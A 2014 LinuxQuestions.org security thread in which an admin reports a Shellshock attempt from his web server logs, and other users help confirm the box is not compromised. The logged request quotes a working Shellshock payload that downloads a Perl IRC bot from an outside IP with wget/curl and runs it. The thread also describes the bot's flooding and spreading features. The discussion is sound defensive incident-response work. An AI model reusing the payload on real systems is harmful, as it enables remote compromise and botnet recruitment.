Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to
LinuxQuestions.org , a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free.
Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please
contact us . If you need to reset your password,
click here .
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a
virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month.
Click here for more info.
09-27-2014, 04:20 PM
#1
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Rep:
Shellschock found in http logs
Found this today in the logs:
Code:
192.227.213.66 - - [27/Sep/2014:10:33:07 -0700] "GET /cgi-bin/hi HTTP/1.0" 404 411 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""
I curl'd
http://213.5.67.223/jurat and it appears to be an IRC-based "something".
I am not comfortable ignoring this because it shows a 404.
I scanned 46.16.178.158 and I can see Unreal ircd running on several ports including 443 shown in the jurat file.
for now, I simply added those 2 IPs to the firewall.
/tmp, is of course empty.
Code:
apt-get changelog bash | less
Get:1 Changelog for bash (http://changelogs.ubuntu.com/changelogs/pool/main/b/bash/bash_4.2-2ubuntu2.5/changelog) [108 kB]
bash (4.2-2ubuntu2.5) precise-security; urgency=medium
* SECURITY UPDATE: out-of-bounds memory access
- debian/patches/CVE-2014-718x.diff: guard against overflow and fix
off-by-one in bash/parse.y.
- CVE-2014-7186
- CVE-2014-7187
* SECURITY IMPROVEMENT: use prefixes and suffixes for function exports
- debian/patches/variables-affix.diff: add prefixes and suffixes in
bash/variables.c.
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Fri, 26 Sep 2014 13:27:53 -0400
bash (4.2-2ubuntu2.3) precise-security; urgency=medium
* SECURITY UPDATE: incomplete fix for CVE-2014-6271
- debian/patches/CVE-2014-7169.diff: fix logic in bash/parse.y.
- CVE-2014-7169
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Thu, 25 Sep 2014 02:11:10 -0400
bash (4.2-2ubuntu2.2) precise-security; urgency=medium
* SECURITY UPDATE: incorrect function parsing
- debian/patches/CVE-2014-6271.diff: fix function parsing in
bash/builtins/common.h, bash/builtins/evalstring.c, bash/variables.c.
- CVE-2014-6271
-- Marc Deslauriers <marc.deslauriers@ubuntu.com> Mon, 22 Sep 2014 15:31:07 -0400
Advice requested and appreciated.
Thanks.
Last edited by Habitual; 09-27-2014 at 04:24 PM .
09-27-2014, 05:39 PM
#2
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmm... IRC controlled bot with tcpflooder, udpflooder and spreader and minimal shell controll ... I'm not sure if it makes to hide as the atd daemon or it uses it to schedule itself for execution (but I can't find where it does this, so my best bet is that it tries to hide as "atd").. I would to a "ps aux | grep atd" and close any atd (if you know it shouldn't run) .. Hmm.. I just realized how rusty my Perl is
09-27-2014, 05:46 PM
#3
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Ok... The bot is very familiar with the one described here:
http://handlers.sans.org/jullrich/perlbot.html
It just exploits a different bug and hides itself as a different proccess..
09-27-2014, 05:51 PM
#4
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Rep:
Thanks Smokey_justme:
Code:
ps aux | grep atd
daemon 814 0.0 0.0 16908 164 ? Ss Sep26 0:00 atd
root 31092 0.0 0.0 8104 928 pts/0 S+ 15:40 0:00 grep --color=auto atd
root@web:~# lsof -p 814
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
atd 814 daemon cwd DIR 202,1 4096 144612 /var/spool/cron/atjobs
atd 814 daemon rtd DIR 202,1 4096 2 /
atd 814 daemon txt REG 202,1 23152 8081 /usr/sbin/atd
atd 814 daemon mem REG 202,1 52120 139250 /lib/x86_64-linux-gnu/libnss_files-2.15.so
atd 814 daemon mem REG 202,1 47680 139448 /lib/x86_64-linux-gnu/libnss_nis-2.15.so
atd 814 daemon mem REG 202,1 97248 145848 /lib/x86_64-linux-gnu/libnsl-2.15.so
atd 814 daemon mem REG 202,1 35680 138615 /lib/x86_64-linux-gnu/libnss_compat-2.15.so
atd 814 daemon mem REG 202,1 14768 145346 /lib/x86_64-linux-gnu/libdl-2.15.so
atd 814 daemon mem REG 202,1 1811128 138163 /lib/x86_64-linux-gnu/libc-2.15.so
atd 814 daemon mem REG 202,1 55744 134835 /lib/x86_64-linux-gnu/libpam.so.0.83.0
atd 814 daemon mem REG 202,1 149280 144960 /lib/x86_64-linux-gnu/ld-2.15.so
atd 814 daemon 0u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 1u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 2u CHR 1,3 0t0 4763 /dev/null
atd 814 daemon 3uW REG 0,15 4 7698 /run/atd.pid
Given the low pid, I'd venture a guess that atd supposed to be running...
No new crons, rkhunter results are as expected.
My concern is that perl processes can fork and hide as discussed
here...
Good stuff at
http://handlers.sans.org/jullrich/perlbot.html - Thanks.\
Pasted at pastebin.com 2 days ago -
http://pastebin.com/gQ3wz2ET
Last edited by Habitual; 09-27-2014 at 06:02 PM .
09-27-2014, 06:01 PM
#5
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmm.. Low PIDs are not an indicator of a clean process (well, they are, but PIDs are reussable so I wouldn't risk making a security judgment based on them)...
But it just hit me that the user is, since the false "atd" proccess would be running the same user as the web-server.. So.. yeah.. you don't have to worry about being infected..
It's however pretty scary stuff when we start thinking about how many servers are out there with an unfixed bash... Mrrr.. And I used to think that only Windows machines can be used as bot-farms..
09-27-2014, 06:15 PM
#6
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Rep:
Well, if it was masquerading as atd, wouldn't lsof 'find' whatever processes were running from it as a result?
Assuming lsof hadn't been messed with?
Code:
stat /run/atd.pid
File: `/run/atd.pid'
Size: 4 Blocks: 8 IO Block: 4096 regular file
Device: fh/15d Inode: 7698 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2014-09-26 06:41:01.925729001 -0700
Modify: 2014-09-26 06:41:01.925729001 -0700
Change: 2014-09-26 06:41:01.925729001 -0700
Birth: -
root@web:~# cat /run/atd.pid
814
root@web:~# uptime
16:06:51 up 1 day, 9:26, 1 user, load average: 0.00, 0.06, 0.19
Code:
apt-get changelog lsof | less
Get:1 Changelog for lsof (http://changelogs.ubuntu.com/changelogs/pool/main/l/lsof/lsof_4.81.dfsg.1-1build1/changelog) [10.6 kB]
lsof (4.81.dfsg.1-1build1) lucid; urgency=low
* rebuild rest of main for armel armv7/thumb2 optimization;
UbuntuSpec:mobile-lucid-arm-gcc-v7-thumb2
-- Alexander Sack <asac@ubuntu.com> Sun, 07 Mar 2010 00:56:30 +0100
matches "Modify" in stat output...
Code:
stat -c%y /usr/bin/lsof
2010-03-06 19:33:48.000000000 -0800
Thanks for your time.
09-27-2014, 06:19 PM
#7
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Hmmm... you've gone to great lenghts just to prove me I'm right about you not being infected? Am I misreading your post or are you misreading mine?
I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be
09-27-2014, 06:21 PM
#8
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Rep:
Quote:
Originally Posted by
Smokey_justme
Hmmm... you've gone to great lenghts just to prove me I'm right about you not being infected? Am I misreading your post or are you misreading mine?
I'm sorry if you're upset about me commenting about you basing a conclusion on the PID... I really am.. I should have just let it be
I'm just trying to verify that my thought processes and technique on such Important matters is sound.
Last edited by Habitual; 09-27-2014 at 06:23 PM .
09-27-2014, 06:27 PM
#9
Member
Registered: Oct 2009
Distribution: Slackware
Posts: 534
Quote:
Originally Posted by
Habitual
I'm just trying to verify that my thought processes and technique on such Important matters is sound.
Well, it seems to be.. If it looks like horse and smells like a horse.. It's either the NSA disguised as a zebra or an actual horse...
09-27-2014, 08:10 PM
#10
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Original Poster
Rep:
Well, I'm glad someone else thinks so!
Thanks for all your feedback.
and just in case someone lands here in x years, I ran this also:
Code:
ps -p 814 -o lstart | tail -1 && last reboot | head -1
Fri Sep 26 06:41:01 2014
reboot system boot 3.2.0-69-virtual Fri Sep 26 06:41 - 18:17 (1+11:36)
and that shows me that atd has been running since last system boot.
Last edited by Habitual; 09-27-2014 at 08:18 PM .
All times are GMT -5. The time now is 04:56 AM .
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know .
Latest Threads
LQ News